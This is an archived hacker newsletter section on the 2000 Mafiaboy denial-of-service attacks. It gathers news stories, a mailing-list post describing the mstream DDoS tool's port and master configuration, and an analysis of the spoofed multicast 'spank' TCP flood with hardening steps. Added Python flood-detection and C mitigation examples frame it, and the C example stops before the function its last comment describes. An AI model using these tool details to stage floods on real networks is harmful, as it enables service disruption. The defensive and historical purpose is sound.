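The egress check that Schmidt's account above implies, as an added example that is not part of the original article: it scans per-minute flow summaries for an internal host sending a sustained, almost unanswered packet stream to a single outside address. The campus prefix, thresholds and flow records are constructed assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumption: a documentation prefix stands in for the campus address space.
CAMPUS_NET = ip_network("192.0.2.0/24")

# Constructed per-minute flow summaries: (minute, source, destination, packets).
FLOWS = [
    # Workstation browsing: replies roughly match requests.
    (0, "192.0.2.15", "198.51.100.7", 420), (0, "198.51.100.7", "192.0.2.15", 510),
    (1, "192.0.2.15", "198.51.100.7", 380), (1, "198.51.100.7", "192.0.2.15", 450),
    # Mail relay: busy, but traffic flows both ways.
    (3, "192.0.2.25", "198.51.100.40", 15000), (3, "198.51.100.40", "192.0.2.25", 12000),
    (4, "192.0.2.25", "198.51.100.40", 14800), (4, "198.51.100.40", "192.0.2.25", 11900),
    # Log forwarder: a single one-way burst, over within a minute.
    (1, "192.0.2.90", "198.51.100.99", 11000),
    # Lab host: sustained, almost unanswered stream to one outside address.
    (3, "192.0.2.77", "203.0.113.10", 58000),
    (4, "192.0.2.77", "203.0.113.10", 61000), (4, "203.0.113.10", "192.0.2.77", 12),
    (5, "192.0.2.77", "203.0.113.10", 60500),
]


def longest_run(samples):
    """Return the longest stretch of consecutive minutes from (minute, packets) pairs."""
    samples = sorted(samples)
    best = run = [samples[0]]
    for sample in samples[1:]:
        # Extend the current run if this minute follows the previous one.
        run = run + [sample] if sample[0] == run[-1][0] + 1 else [sample]
        if len(run) > len(best):
            best = run
    return best


def find_flood_sources(flows, campus=CAMPUS_NET, min_packets=10_000,
                       min_ratio=20.0, min_minutes=2):
    """Flag internal hosts with sustained, one-way, high-rate egress to one peer."""
    sent = defaultdict(int)      # (internal host, outside peer, minute) -> packets out
    received = defaultdict(int)  # same key -> packets coming back
    for minute, src, dst, packets in flows:
        src_inside = ip_address(src) in campus
        dst_inside = ip_address(dst) in campus
        if src_inside and not dst_inside:
            sent[(src, dst, minute)] += packets
        elif dst_inside and not src_inside:
            received[(dst, src, minute)] += packets

    # Keep the minutes in which a host/peer pair is both loud and one-sided.
    hot = defaultdict(list)
    for (host, peer, minute), out_pkts in sent.items():
        in_pkts = received.get((host, peer, minute), 0)
        if out_pkts >= min_packets and out_pkts / max(in_pkts, 1) >= min_ratio:
            hot[(host, peer)].append((minute, out_pkts))

    findings = []
    for (host, peer), samples in hot.items():
        run = longest_run(samples)
        if len(run) >= min_minutes:  # ignore short bursts
            findings.append({
                "host": host,
                "target": peer,
                "first_minute": run[0][0],
                "last_minute": run[-1][0],
                "packets": sum(p for _, p in run),
            })
    return sorted(findings, key=lambda f: -f["packets"])


if __name__ == "__main__":
    for finding in find_flood_sources(FLOWS):
        print(finding)
```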
@HWA
11.0 Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.washingtonpost.com/wp-dyn/articles/A46086-2000Apr19.html
Canada Arrests 'Mafiaboy' Hacker, Aged 15
Reuters Apr 19 2000 7:49PM ET
MONTREAL (Reuters) - A 15-year-old hacker, known online as
''Mafiaboy'', was charged by Canadian police on Wednesday with
mischief in one of the biggest cyber attacks in history.
The charges relate to the jamming of the CNN.com (TWX.N) Web
site and up to 1,200 CNN-hosted sites for four hours on February 8.
Mafiaboy, who cannot be named under a Canadian law that protects
the identities of juveniles charged with crimes, was arrested on
Saturday and formally charged on Monday, the Royal Canadian
Mounted Police told a news conference.
Police Inspector Yves Roussel said investigators were able to track
the 15-year-old boy in part because he bragged about his alleged
exploit in messages sent to Internet chat rooms.
``This individual, using the nickname Mafiaboy, would have publicized
on many occasions that he was the person responsible for those
attacks,'' Roussel said.
``The prosecution intends to demonstrate before the court that
Mafiaboy is responsible for the denial-of-service attack that was
launched for more than four hours on the 8th of February against the
CNN site and all the sites that are hosted by this company -- and
we're talking roughly 1,200 of those,'' Roussel said.
The Mounties charged Mafiaboy with two counts of mischief to data,
which carries a maximum sentence for juveniles up to two years in
detention and a C$1,000 ($675) fine.
Mafiaboy has been released but his bail conditions include not using a
computer except for academic purposes and under the supervision of
a teacher.
He is also prohibited from connecting to the Internet or frequenting
stores that sell computers or computer paraphernalia. Police seized all
of the computers and related material found at the boy's home.
Police said the investigation into the series of cyber attacks that
locked up some of the Internet's most popular Web sites in February
continues and there could be other arrests.
The ``denial-of-service'' attacks in early February shut down such
Web sites as Yahoo! (YHOO.O), Amazon.com (AMZN.O), eBay
(EBAY.O), BUY.COM (BUYX.O), Excite (ATHM.O) and E-Trade
(EGRP.O).
Mafiaboy was not charged in connection with the attacks against
those sites. The Mounties and FBI declined to say whether they had
identified other suspects in the wider investigation involving those
sites.
``We had to do something to prevent further actions from Mafiaboy.
That's why we arrested him last weekend,'' Roussel said.
``However, the investigation is ongoing and there is literally tons of
information to scrutinize. There is a possibility that other people might
be arrested,'' he added.
Police would not comment on whether Mafiaboy acted alone in the
Web assault on CNN's site or was part of a group. They also would
not divulge how many computers he may have used.
In Washington, U.S. Attorney General Janet Reno said on
Wednesday that Mafiaboy must face punishment.
``I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get
away with something like this scot-free,'' Reno told reporters on
Capitol Hill. ``There has got to be a remedy, there has got to be a
penalty.''
Reno said the U.S. government continued to work with industry on
that incident and others, now that law enforcement has shown it can
crack cyber-attack cases.
``I believe this recent breakthrough demonstrates our capacity to
track down those who would abuse this remarkable new technology,
and track them down wherever they may be,'' she said.
In the February Web site assaults, attackers meticulously obtained
remote control of computers around the world. They then used the
computers to bombard the targeted Web sites, flooding them with so
much data that legitimate users were temporarily denied access or
service.
Police refused to provide any details that would identify Mafiaboy, or
comment on speculation that he attends a suburban Montreal high
school. The Mounties' Inspector Roussel downplayed Mafiaboy's
computer hacking abilities, saying he likely did not have to devise any
special programs to gain access to targeted computers.
``It is our evaluation that Mafiaboy was not that good, actually. He
had a good knowledge of computers, however, he was not what we
could call a genius in that field,'' Roussel said. William Lynn, an FBI
agent who is assistant legal attache at the U.S. Embassy in Ottawa,
said investigators were not surprised to discover that Mafiaboy was a
juvenile.
``In our profiling of these types of matters it is common for us to
consider this as a possibility,'' he told reporters.
The Mounties said their investigation included their Computer
Investigation and Support Unit in Montreal, a division of the FBI, the
U.S. Justice Department and the U.S. National Infrastructure
Protection Center. Canadian police joined the hunt for the hackers in
mid-February as investigators suspected that a Canadian server had
been used in the assault.
The February attacks alarmed Internet users across the globe, cost
Web sites millions of dollars in revenue and shook the electronic
commerce industry because of the apparent ease with which major
sites were made inaccessible.
ABC's television news division said on Tuesday that investigators
were allegedly able to trace the attacks to Mafiaboy by examining the
log files of a computer at a University of California, Santa Barbara,
research lab that was among those used to attack CNN.com. A
hacker electronically broke into the UCSB computer on Feb. 8 and
instructed it to send large amounts of traffic to CNN.com's Web site,
ABC quoted campus network programmer Kevin Schmidt as saying.
Jeffrey Johnson, chief executive of Meta Secure-com Solutions, an
Atlanta-based electronic commerce security firm, said that in such
Web attacks, hackers usually use several ''zombie'' computers to
which they had already illegally gained remote control to flood the
target site with incoming streams of nuisance data.
Johnson said Mafiaboy had been well known in the hacker
underground and in a popular Internet chat room for about two years.
Mafiaboy stood out from others because he often bragged in the
online chat room about how he planned to take down a few Web
sites.
``He was looking for bragging rights. He was doing it to show that he
has power,'' Johnson said.
Copyright (c) 2000 Reuters Limited. All rights reserved. Republication
or redistribution of Reuters content, including by framing or similar
means, is expressly prohibited without the prior written consent of
Reuters. Reuters shall not be liable for any errors or delays in
the content, or for any actions taken in reliance thereon. All active
hyperlinks have been inserted by AOL.com.
@HWA
11.1 Mafiaboy:Canadian Arrest Made in February Web Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://abcnews.go.com/wire/US/reuters20000419_1950.html
WIRE:04/19/2000 10:10:00 ET
Canadian Arrest Made in February Web Attacks
MONTREAL (Reuters) - Canadian police were set to reveal details on
Wednesday of an arrest made in connection with February's cyber
attacks that jammed some of the Internet's most popular Web sites,
amid reports the suspect is a 15-year-old known online as Mafiaboy.
The Royal Canadian Mounted Police said on Tuesday
that charges had been brought against what they
described only as "a person" in the cyber attacks.
"The investigation has given authorities the opportunity to
bring light on Internet attacks that have strongly shaken
the heart of electronic commerce worldwide, causing
losses that were evaluated at many hundred millions of
U.S. dollars," the force said in a statement.
The "denial-of-service" attacks on Feb. 2 shut down such
popular Web sites as Yahoo! (YHOO.O), Amazon.com
(AMZN.O) and eBay (EBAY.O) for hours.
In the assault, attackers meticulously obtained remote
control of over computers around the world. They then
used the computers to bombard the targeted Web sites,
flooding them with so much data that legitimate users
were temporarily denied access or service.
The Mounties declined to comment further on the arrest,
but ABC News reported on Tuesday that a 15-year-old
boy who used the online moniker Mafiaboy was arrested
over the weekend in the Montreal area and charged on
Monday.
The news division of the U.S. television network said
records in the case had been sealed because of the
suspect's age. Under Canada's Young Offenders Act,
authorities are not allowed to reveal the identities of
individuals less than 17 years of age who are charged
with crimes and set to be tried in juvenile court.
The Canadian police promised to release more
information at a news conference in Montreal at 10:30
a.m. EDT (1430 GMT) on Wednesday.
The U.S. Justice Department and the FBI were expected
to make a statement afterward. No comment was
immediately available from the department.
The Mounties said their investigation included their
Computer Investigation and Support Unit in Montreal, a
division of the FBI, the U.S. Justice Department and U.S.
National Infrastructure Protection Center. Canadian
police joined the hunt for the hackers in mid-February as
investigators suspected that a Canadian server had been
used in the assault.
The February attacks alarmed Internet users across the
globe, cost Web sites millions of dollars in revenue and
shook the electronic commerce industry because of the
apparent ease with which major sites were made
inaccessible.
ABC said investigators were allegedly able to trace the
attacks to Mafiaboy by examining the log files of a
computer at a University of California, Santa Barbara,
research lab that was among those used to attack
CNN.com (TWX.N).
A hacker electronically broke into the UCSB computer
on Feb. 8 and instructed it to send large amounts of
traffic to CNN.com's Web site, ABC quoted campus
network programmer Kevin Schmidt as saying.
ABC News said the FBI obtained chat room logs
allegedly showing that Mafiaboy had asked others what
sites he should take down before they were attacked.
Internet security expert Michael Lyle told the network he
had communicated with Mafiaboy and the 15-year-old
said he had attacked not only CNN.com but also
E*TRADE and several smaller Web sites.
A subscriber called Mafiaboy previously held two
accounts with Delphi Supernet, a Montreal Internet
service provider that Toronto-based ISP Internet Direct
bought last year.
The accounts were closed in March 1998 because
Mafiaboy violated subscriber policies, but Internet Direct
would not say what the violations were.
@HWA
11.2 Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://my.aol.com/news/story.tmpl?table=n&cat=01&id=0004190119676550
Reno Says 'Mafiaboy' Hacker Must Face Punishment
Reuters
Apr 19 2000 1:19PM ET
WASHINGTON (Reuters) - U.S. Attorney General Janet Reno said
on Wednesday a 15-year-old boy arrested in Canada for jamming
the CNN.com Web site and other sites in February must face
punishment.
Canadian police in Montreal announced charges against the
15-year-old hacker known online as ``Mafiaboy'' for jamming the
CNN.com Web site and up to 1,200 CNN-hosted sites for four
hours on Feb. 8.
``I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get
away with something like this scot-free,'' Reno told reporters on
Capitol Hill. ``There has got to be a remedy, there has got to be a
penalty.''
Reno said the U.S. government continued to work with industry on
that incident and others, now that law enforcement has shown it can
crack cyber-attack cases.
``I believe this recent breakthrough demonstrates our capacity to
track down those who would abuse this remarkable new technology,
and track them down wherever they may be,'' she said.
@HWA
11.3 Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks,
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://more.abcnews.go.com/sections/tech/dailynews/webattacks000216.html
"Mafiaboy" Suspected
FBI Has Evidence That He and Others Launched Web Attacks, Expert Says
A customer peruses computer wares for sale at a hacker convention. The FBI
is questioning hackers, computer security experts and others who might
have information on last week's Web attacks. (Lori Cain/AP Photo)
By Jonathan Dube
Feb. 16 -- A hacker who calls himself "mafiaboy" is believed to be
responsible for at least two of the attacks on leading Web sites, a
security expert tells ABCNEWS.com.
FBI seeks hackers in Web attacks.
Chat room logs now in the possession of the FBI show that "mafiaboy"
asked others what sites he should take down -- before the sites were
attacked, Internet security expert Michael Lyle said. In a
later conversation with Lyle, mafiaboy claimed credit for attacking
CNN.com, E*TRADE and several smaller sites, and he shared technical
information that only someone involved in the attacks would know,
Lyle said.
The FBI now has reason to believe that the attacks last
week that took down seven leading Web sites and at least six smaller
Web sites were launched by several people, acting independently.
Mafiaboy, who has been described as a 15-year-old Canadian, is
believed to be a copycat who launched his attacks only after Yahoo!
was knocked offline on Feb. 7.
Mafiaboy's Claims Seem Credible
Dozens of hackers have claimed credit for the attacks in online chats,
but Lyle says mafiaboy is the only one so far who appears to be credible.
"Mafiaboy was saying 'What should I hit next? What should I hit
next?' and people on the channel were suggesting sites, and mafiaboy
was saying, 'OK, CNN,'" said Lyle, the chief technology officer for
Recourse Technologies Inc., an Internet security company in Palo
Alto, Calif. "And shortly thereafter the people on the channel would
be talking about CNN going down. If you look at the time stamps on
the logs, they also coincide with CNN going down."
Lyle said the log files show similar discussions prior to the Feb. 9
attacks on E*TRADE and several other smaller sites. Chat room log
files can be faked, but Lyle said he's spoken with a number of others
who witnessed the conversations live and verified their authenticity.
Mafiaboy Knows Details
Moreover, Lyle said he spoke with mafiaboy over the Internet last
Thursday and again last Friday and those conversations bolstered the
evidence against the young hacker. Mafiaboy also said he was breaking
into computers that were using a program called WUFTP, which is often
used to exchange data on university computers, Lyle said. Mafiaboy said
these computers were using an old version of WUFTP that had security
flaws in it and thus he was able to install the attack software on the
computers, Lyle said. He is believed to have installed attack software
called Tribal Flood Network, or TFN, on dozens of computers, making
them into "zombies" that he could then instruct to launch the attacks.
Lyle said mafiaboy told him specific details about the ports that he
used to connect with the zombie computers and launch the attacks --
information that only someone involved in the attack would know.
More Than One Attacker
The reason investigators believe different culprits were responsible
for some of the attacks is that the software tools used to launch the
attacks on Yahoo! and eBay were different than those used to attack
CNN.com and E*TRADE, Lyle said. The attacks on CNN.com and E*TRADE are
believed to have been launched using TFN, a software program that's
widely available on the Internet. The attacks on Yahoo! and eBay were
launched using a more sophisticated set of tools, he said.
Toronto-based Internet service provider Internet Direct said the
Royal Canadian Mounted Police had warned it that a subscriber called
"mafiaboy" previously held two accounts with Delphi Supernet, a Montreal
ISP the company bought last year. The accounts were closed in March 1998
because mafiaboy violated subscriber policies, but Internet Direct would
not say what the violations entailed.
Lyle says he has turned his information over to the FBI and has been
working with investigators. Based on his conversations with mafiaboy,
Lyle said the teen likely committed the attacks to boost his notoriety
within the hacker community. "There's this real effort among the people
on all these channels to try and stand out and look like the best
hacker, or one of the best," Lyle said. "And I think that that's what
he was searching after. That really explains why he would brag the way
he did about it."
FBI Interviews �Coolio� ABCNEWS has also learned that the FBI has
interviewed a hacker called �coolio� in connection with last week�s Web
attacks, but he denied any involvement. FBI officials told ABCNEWS� Brian
Ross they had tracked down the teenage hacker in Southern California
because they believed he might have useful information for their
investigation. Coolio is well known to authorities as a member of "Global
Hell," a group of teenagers who have hacked into White House and
Department of Defense computer systems. The officials said members of
Global Hell are still under investigation in connection with last week's
Web attacks. The FBI also wants to question a hacker known as "nachoman."
Officials have been careful to say they are not suspects, but just want to
talk to them about important information relating to the attacks.
Fast-Developing Leads
In Washington, FBI Director Louis Freeh said
today investigators are running down hundreds of leads related to the Web
attacks, but still face substantial hurdles. "There are fast developing
leads as we speak," Freeh told a Senate subcommittee. Freeh said the
investigation has led the FBI to at least four other countries, including
Canada and Germany. He also said FBI field offices in five cities are
participating in the investigation: Los Angeles, San Francisco, Atlanta,
Boston and Seattle. The FBI began investigating after leading Web portal
Yahoo! was attacked and made inaccessible for several hours on Feb. 7.
Then, on Feb. 8, Buy.com, Amazon.com, eBay and CNN.com were assaulted. And
on Feb. 10, technology site ZDNet and online trading site E*TRADE suffered
attacks. As many as 13 Web sites may have been attacked. Known as
denial-of-service attacks, the assaults effectively overloaded Web sites
with mock traffic so that real users couldn't access the sites. The
culprits took over computers in various parts of the world and used them
to bombard the victims' sites with data. Investigators have located more
than a half-dozen computers used in last week's attacks. Computers at two
California universities, a Midwestern school, a Berlin university, a
non-university site in Southern California, a home business in Oregon, and
machines at at least four companies were used as "zombies."
@HWA
11.4 Mafiaboy:Hacker cripples Area 51 site for 36 hours
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
04/21/00- Updated 11:36 AM ET
Hacker cripples Area 51 site for 36 hours
RALEIGH, N.C. (AP) - A hacker disrupted service for 36 hours to the Web
site that displays detailed satellite images of Area 51, the top-secret
Air Force site in Nevada.
Raleigh-based Aerial Images Inc. said the hacker struck six hours after
five images of the desert proving ground were loaded Monday night onto the
site, www.terraserver.com.
The attack, combined with traffic 10 times what the site usually bears,
meant millions of people had difficulty accessing the site or could not
connect with it at all, company officials said. Service was disrupted
until Thursday.
''I won't tell you it's completely solved,'' said John Hoffman, Aerial
Images president. ''We've taken steps to mitigate its effect. It's almost
a fact of being online these days.''
Hoffman declined to provide details of the attack, citing an ongoing
investigation.
The Air Force only recently acknowledged that Groom Dry Lake Air Force
Base even exists. Among UFO aficionados, it has long been known simply as
Area 51, the base's designation on old Nevada test site maps. They believe
that unidentified flying objects from other worlds are hidden there.
@HWA
xx.x [ISN] Clearing up questions about denial of service attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Forwarded by: Mark Arena <marena@iinet.net.au>]
Hi all,
I just thought I'd clear up all these rumors, questions etc regarding
the denial of service attacks which happened a while ago.
1) Did mafiaboy use trinoo or smurf?
He didn't use either. He used a program called mstream and yes it's
private. It basically is similar to trinoo. It comprises of a client
and a server. With the server it listens on port 7983 and you specify
the hosts which will connect to the server on that port. For that
reason you must have been added to the server to packet from it. In
the server.c program it appears like this:
char *m[]={
"1.1.1.1", /* first master */
"2.2.2.2", /* second master */
"3.3.3.3", /* third master etc */
0 };
Now as for the client you can define a password, serverfile and max
number of users to use the client at one time. The client then
connects to the servers and gets the servers to send all crap data to
the host you specify and hence if you got enough servers will take
them down eg as mafiaboy did.
2) So did mafiaboy actually hack anything?
The answer is yes. All the machines he installed the server on he had
to have root. Therefore he must have hacked a lot of machines in
preparation for the attack on the sites.
3) Did mafiaboy take out all the sites?
No, mafiaboy only took out yahoo, etrade and some others which I can't
remember. Coolio took out the rest. No matter what you're told I
assure you Coolio took out the rest.
4) How come it took so long for mafiaboy to get arrested?
Simple, he hung low and the fbi etc had not enough evidence to make
an arrest, that was until his outburst on self-evident's msg board. This
allowed the fbi etc to swoop swiftly and quickly.
Now its time for my opinion:
1) Do you think mafiaboy will get convicted?
Well it depends, if mafiaboy admits to dos'ing those sites then yes I
believe he will be convicted then again if he denies it I believe they
won't have enough evidence on him. The only reason they caught him is
that his nick etc was posted on www.self-evident.com He also said to a
person I know that he destroyed the hard drive in a fire which would
give the fbi no physical evidence at his end.
Mafiaboy's story:
Here is a quick rephrase of what mafiaboy has said in channels before
he got arrested. His nick has been edited out for various reasons.
<> god fucking damnit
<> i wish i can go back in time
<> and undo what i did
In closing I'll tell you how I know this. Firstly I have spoken to
people associated with mafiaboy. I also have the program which he used
to take out the sites and no I won't send you it. Any other questions
etc direct them to me and I'll try answering them.
-------------------------------------------------------
Mark Arena marena@iinet.net.au
-------------------------------------------------------
@HWA
13.0 [MM] Cybercrime Solution Has Bugs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/politics/0,1283,36047,00.html
Cybercrime Solution Has Bugs
by Declan McCullagh
3:00 a.m. May. 3, 2000 PDT
WASHINGTON -- U.S. and European police agencies will receive new powers to
investigate and prosecute computer crimes, according to a preliminary
draft of a treaty being circulated among over 40 nations.
The Council of Europe's 65KB proposal is designed to aid police in
investigations of online miscreants in cases where attacks or intrusions
cross national borders.
But the details of the "Draft Convention on Cybercrime" worry U.S. civil
libertarians. They warn that the plan would violate longstanding privacy
rights and grant the government far too much power.
The proposal, which is expected to be finalized by December 2000 and
appears to be the first computer crime treaty, would:
Make it a crime to create, download, or post on a website any
computer program that is "designed or adapted" primarily to gain
access to a computer system without permission. Also banned is
software designed to interfere with the "functioning of a
computer system" by deleting or altering data.
Allow authorities to order someone to reveal his or her passphrase
for an encryption key. According to a recent survey, only Singapore
and Malaysia have enacted such a requirement into law, and experts
say that in the United States it could run afoul of
constitutional protections against self-incrimination.
Internationalize a U.S. law that makes it a crime to possess even
digital images that "appear" to represent children's genitals or
children engaged in sexual conduct. Linking to such a site also would
be a crime.
Require websites and Internet providers to collect information about
their users, a rule that would potentially limit anonymous remailers.
U.S. law enforcement officials helped to write the document, which was
released for public comment last Thursday, and the Justice Department is
expected to urge the Senate to approve it next year. Other non-European
countries actively involved in negotiations include Canada, Japan,
and South Africa.
During recent testimony before Congress, Attorney General Janet Reno
warned of international computer crime, a claim that gained more
credibility last month with the arrest of alleged denial-of-service
culprit Mafiaboy in Canada.
"The damage that can be done by somebody sitting halfway around the world
is immense. We have got to be able to trace them, and we have made real
progress with our discussions with our colleagues in the G-8 and in the
Council of Europe," Reno told a Senate appropriations subcommittee
in February, the week after the denial-of-service attacks took place.
"Some countries have weak laws, or no laws, against computer crimes,
creating a major obstacle to solving and to prosecuting computer crimes. I
am quite concerned that one or more nations will become 'safe havens' for
cyber-criminals," Reno said.
Civil libertarians say the Justice Department will try to pressure the
Senate to approve the treaty even if it violates Americans' privacy
rights.
"The Council of Europe in this case has just been taken over by the U.S.
Justice Department and is only considering law enforcement demands," says
Dave Banisar, co-author of The Electronic Privacy Papers. "They're using
one more international organization to launder U.S. policy."
Banisar says Article 6 of the measure, titled "Illegal Devices," could ban
commonplace network security tools like crack and nmap, which is included
with Linux as a standard utility. "Companies would be able to criminalize
people who reveal security holes about their products," Banisar
said.
"I think it's dangerous for the Internet," says Barry Steinhardt,
associate director of the American Civil Liberties Union and a founder of
the Global Internet Liberty Campaign. "I think it will interfere with the
ability to speak anonymously."
"It will interfere with the ability of hackers -- using that term in a
favorable light -- to test their own security and the security of others,"
Steinhardt said.
Solveig Singleton, director of information studies at the libertarian Cato
Institute says it's likely -- although because of the vague language not
certain -- that anonymous remailers will be imperiled.
The draft document says countries must pass laws to "ensure the
expeditious preservation of that traffic data, regardless whether one or
more service providers were involved in the transmission of that
communication." A service provider is defined as any entity that
sends or receives electronic communications.
Representing the U.S. in the drafting process is the Justice Department's
Computer Crime and Intellectual Property section, which chairs the G-8
subgroup on high-tech crime and also is involved with a cybercrime project
at the Organization of American States. In December 1997 Reno
convened the first meeting on computer crime of the G-8 nations.
A recent White House working group, which includes representatives from
the Justice Department, FBI, and Secret Service has called for
restrictions on anonymity online, saying it can provide criminals with an
impenetrable shield. So has a report from a committee of the
European Parliament.
Other portions of the treaty include fairly detailed descriptions of
extradition procedures and requirements for countries to establish
around-the-clock computer-crime centers that police groups in other
countries may contact for immediate help.
The Council of Europe is not affiliated with the European Union, and
includes over 40 member nations, including Russia, which joined in 1996.
After the Council of Europe's expert group finalizes the proposed treaty,
the full committee of ministers must adopt the text. Then it will be sent
to countries for their signatures. Comments can be sent to daj@coe.int.
@HWA
14.0 [IND] The new spank.c DoS attack tool source and an analysis paper by 1st
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------
Explanation of the 'spank' attack
-- a new breed stream/raped
------------------------------------------------
By: lst (yardley@uiuc.edu)
This is a tad different than the previous release. Stream/Raped merely
flooded the host with ack's (or no flags) and came from random ips with
random sequence numbers and/or ack numbers. The difference now is that
this not only does the previous stuff, but also directly attacks from and
to multicast addresses as well. Just as before, rate limiting should be
done to counteract its effect (the same idea as ICMP_BANDLIM). The
multicast handling should also be checked to verify that it is behaving
properly.
The attacker specifies the port[s] that they want to send the attack to.
Depending on what ports are selected, you will have different net
results. If the port is an open port, then you will possibly have a longer
kernel path to follow before the drop. Therefore, a smart attacker will
hit open ports, but havoc can also come about from random ports due to
states and processing.
In the best case scenario, you will experience only the lag of the flood
and the lag of the processing (currently) and then be fine when the
attacker stops. In the worst case, you lock up, kill the network, and
possibly have to reboot. Once you patch it, you deal with a lot less
processing time (the drops are handled without the RST flag when
appropriate--bandlim type idea). In other words, you go to the drop
routine instead of dropwithrst, silencing your response, which decreases
your processing time, the hit on your network, and the effect of the flood
(once a threshold is reached, all those bad packets are silently dropped
and the attack has less of a net effect).
The filters that were presented at the beginning of this email will block
all multicast packets that come out (and in) the tcp stack. I have been
getting mailed a lot about this. Here is why I said the previous
statement. Receiving a packet with no flags is considered an illegal
packet (obviously) and is often dumped, however, as we have seen in
the past, illegal packets often wreak havoc and often go untested.
There is very little that "raped.c" or "stream.c" actually showed as
problems in the TCP/IP stacks. The true problem lies more in the effects
of the response (caused by the attack). This is the same concept as the
SYN floods of yesteryear, and the same type of thing will be done to handle
it. The main difference is that it will be on a simpler note because there
isn't much need for a "cookie" based system. One should just throttle the
response of the reset packets which in turn will help stop the storm that
you generate and in general, harden the tcp/ip stack to behave the way it
is supposed to.
The main effect of this attack is that you are shooting back RST+ACK's at
all the spoofed hosts. Obviously, a lot of these hosts will not exist and
you will get ICMP unreaches (as an example) bounced back at you. There are
other possibilities as well, but unreach would be the most common
(redirects might be common as well although I did not spend the time to
analyze that). The ones that don't respond back may send you some packets
back as well (depending on if the port was valid or not and what their
firewall rules are). This type of attack is complicated by the multicasts,
and the effect is amplified as well. All in all, it becomes very nasty
very quick. Basically, this causes a nice little storm of packets, in the
ideal case.
Note that I said ideal case in the previous paragraph. This is not always
the observed behavior. It all depends on what is on the subnet, what type
of packets are received, what rules and filters you have set up, and even
the duration of the flood. It has been pointed out several times that the
machine will go back to normal once the attack is stopped, which is exactly
why something like ICMP_BANDLIM will work.
I have also been asked a lot about what this "bug" affects. I have seen it
have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has
also seemed to affect some hubs, switches, routers, or gateways since
entire subnets have "disappeared" briefly after the attack. The multicast
attack seems to be more deadly to the network than the previous attack and
its effects get amplified and even carried over to the rest of the network
(bypassing secluded network bounds). I don't have more specifics on the
systems affected because of the difficulty in testing it (and keeping the
network up) since I do not have local access to the networks that I tested
on, and remote access gets real ugly real fast.
Another possibility that has been suggested as to why some machines die is
that the machine's route table is being blown up by the spoofed
packets. Each spoofed packet has a different source address which means
that a temporary route table entry is being created for each one. These
entries take time to timeout. Use 'vmstat -m' and check the 'routetbl'
field while the attack is going on.
Route table entries can be controlled somewhat under freebsd with:
[root@solid]::[~] sysctl -a | fgrep .rt
net.inet.ip.rtexpire: 3600
net.inet.ip.rtminexpire: 10
net.inet.ip.rtmaxcache: 128
You can do the following, to help if the route table is at least part of
the problem:
sysctl -w net.inet.ip.rtexpire=2
sysctl -w net.inet.ip.rtminexpire=2
Things that will help:
1. Drop all multicast packets (ingress and egress) that are addressed to
the tcp stack because multicasts are not valid for tcp.
2. Extend bandwidth limiting to include RST's, ACK's and anything else
that you feel could affect the stability of the machine.
3. Don't look for listening sockets if the packet is not a syn
I hope that this helps, or explains a little more at least.
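The three mitigations listed above, modeled as a user-space decision function for segments that match no existing connection. This is an added example, not code from the paper or from any vendor patch; the struct and function names, the listener table, the replayed addresses and the limit of 200 RSTs per second are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>

#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_ACK 0x10

/* 224.0.0.0/4: every address whose top four bits are 1110 */
#define IS_MULTICAST(a) (((a) & 0xF0000000u) == 0xE0000000u)

enum verdict { DROP_MULTICAST, DROP_SILENT, DROP_RATE_LIMITED,
               SEND_RST, TO_LISTENER, N_VERDICTS };

struct seg { uint32_t src, dst; uint16_t dport; uint8_t flags; };

struct stack {
    unsigned rst_limit;   /* RSTs allowed per second (assumed tunable) */
    uint32_t window;      /* the second the counter applies to */
    unsigned rst_sent;    /* RSTs already sent in that second */
    unsigned lookups;     /* listener-table searches performed */
};

static const uint16_t LISTEN_PORTS[] = { 80, 443 };  /* constructed sample */

struct stack new_stack(unsigned limit)
{
    struct stack s = { limit, 0, 0, 0 };
    return s;
}

static int has_listener(struct stack *s, uint16_t port)
{
    s->lookups++;
    for (size_t i = 0; i < sizeof LISTEN_PORTS / sizeof LISTEN_PORTS[0]; i++)
        if (LISTEN_PORTS[i] == port)
            return 1;
    return 0;
}

/* Item 2: the same per-second budget idea as ICMP_BANDLIM, applied to RSTs */
static int rst_allowed(struct stack *s, uint32_t now)
{
    if (now != s->window) {
        s->window = now;
        s->rst_sent = 0;
    }
    if (s->rst_sent >= s->rst_limit)
        return 0;
    s->rst_sent++;
    return 1;
}

enum verdict classify(struct stack *s, const struct seg *p, uint32_t now)
{
    /* Item 1: multicast is never valid for TCP, drop without answering */
    if (IS_MULTICAST(p->src) || IS_MULTICAST(p->dst))
        return DROP_MULTICAST;
    /* Standard TCP behaviour: a RST is never answered with a RST */
    if (p->flags & TH_RST)
        return DROP_SILENT;
    /* Item 3: only a pure SYN is worth a listener lookup (&& short-circuits) */
    if ((p->flags & (TH_SYN | TH_ACK)) == TH_SYN && has_listener(s, p->dport))
        return TO_LISTENER;
    /* Everything else would draw a RST: throttle it instead of storming */
    return rst_allowed(s, now) ? SEND_RST : DROP_RATE_LIMITED;
}

struct tally { unsigned v[N_VERDICTS]; };

/* Replays n constructed ACK segments, all within one second `now`.
 * Sources vary inside 10.0.0.0/8; every fourth one targets 224.0.0.1. */
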